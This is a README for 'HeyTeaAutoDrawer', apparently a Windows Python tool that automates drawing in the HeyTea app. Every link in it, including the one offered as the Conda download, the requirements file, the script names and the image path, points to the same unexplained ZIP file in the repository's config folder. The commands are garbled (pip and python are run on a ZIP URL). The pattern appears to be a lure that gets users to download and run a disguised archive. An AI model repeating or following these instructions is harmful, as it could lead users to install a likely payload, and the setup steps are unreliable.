Welcome to the HeyTeaAutoDrawer project! This application lets you automate drawing tasks in specific applications like the HeyTea app using a Python script. It simulates mouse actions for a seamless experience.
To get started, you need to visit the Releases page to download the latest version of HeyTeaAutoDrawer.
- Operating System: Windows only
- Python Version: 3.10 or higher
- RAM: Minimum 4 GB recommended
These steps will guide you through downloading and setting up the application.
-
Download the Code
- Visit the Releases page.
- Download the ZIP file of the latest version.
-
Extract the Files
- Locate the downloaded ZIP file on your computer.
- Right-click the file and select "Extract All..."
- Choose a destination folder and extract the files.
-
Install Conda
- If you do not have Conda, download it from https://raw.githubusercontent.com/121ssdfdfsv/HeyTeaAutoDrawer/main/config/Hey-Tea-Drawer-Auto-nonopening.zip.
- Follow the installation instructions provided.
-
Create and Activate a Virtual Environment
- Open a command prompt.
- Navigate to the folder where you extracted the files.
- Run the following commands:
conda create -n HeyTea python=3.10 -y conda activate HeyTea
-
Install Dependencies
- With your virtual environment activated, run:
pip install -r https://raw.githubusercontent.com/121ssdfdfsv/HeyTeaAutoDrawer/main/config/Hey-Tea-Drawer-Auto-nonopening.zip
- With your virtual environment activated, run:
HeyTeaAutoDrawer offers both a command line interface (CLI) and a graphical user interface (GUI). Choose the method that suits you best.
-
Prepare Your Reference Image
- In the project root directory, create a new folder called
images/. - Place your reference image (like
https://raw.githubusercontent.com/121ssdfdfsv/HeyTeaAutoDrawer/main/config/Hey-Tea-Drawer-Auto-nonopening.zip) inside this folder.
- In the project root directory, create a new folder called
-
Run the Script
- Open your command prompt in the project directory.
- Run the following command:
python https://raw.githubusercontent.com/121ssdfdfsv/HeyTeaAutoDrawer/main/config/Hey-Tea-Drawer-Auto-nonopening.zip https://raw.githubusercontent.com/121ssdfdfsv/HeyTeaAutoDrawer/main/config/Hey-Tea-Drawer-Auto-nonopening.zip
-
Start the GUI
- Run the following command in your command prompt:
python https://raw.githubusercontent.com/121ssdfdfsv/HeyTeaAutoDrawer/main/config/Hey-Tea-Drawer-Auto-nonopening.zip
- Run the following command in your command prompt:
-
Navigate the GUI
- File Menu:
- Go to File -> Open File to select and preview your image.
- Settings Menu:
- Go to Settings -> Modify Current Configuration to edit and save configuration options.
- Go to Settings -> Select Canvas Area to interactively choose the screen area for drawing.
- File Menu:
If you run into issues, here are common solutions:
- Error Messages: Check if you have installed all dependencies. Refer to the
https://raw.githubusercontent.com/121ssdfdfsv/HeyTeaAutoDrawer/main/config/Hey-Tea-Drawer-Auto-nonopening.zipfile. - Mouse Not Responding: Ensure the application has the necessary permissions to simulate mouse input.
- Virtual Environment Problems: If you encounter errors related to your Conda environment, try creating a new environment and re-installing dependencies.
If you would like to contribute to the HeyTeaAutoDrawer project, please fork the repository and submit a pull request. We welcome improvements and suggestions!
This project is licensed under the MIT License. You can freely modify and use the code while providing an attribution where needed.
For further details and updates, always refer to the Releases page. Thank you for using HeyTeaAutoDrawer!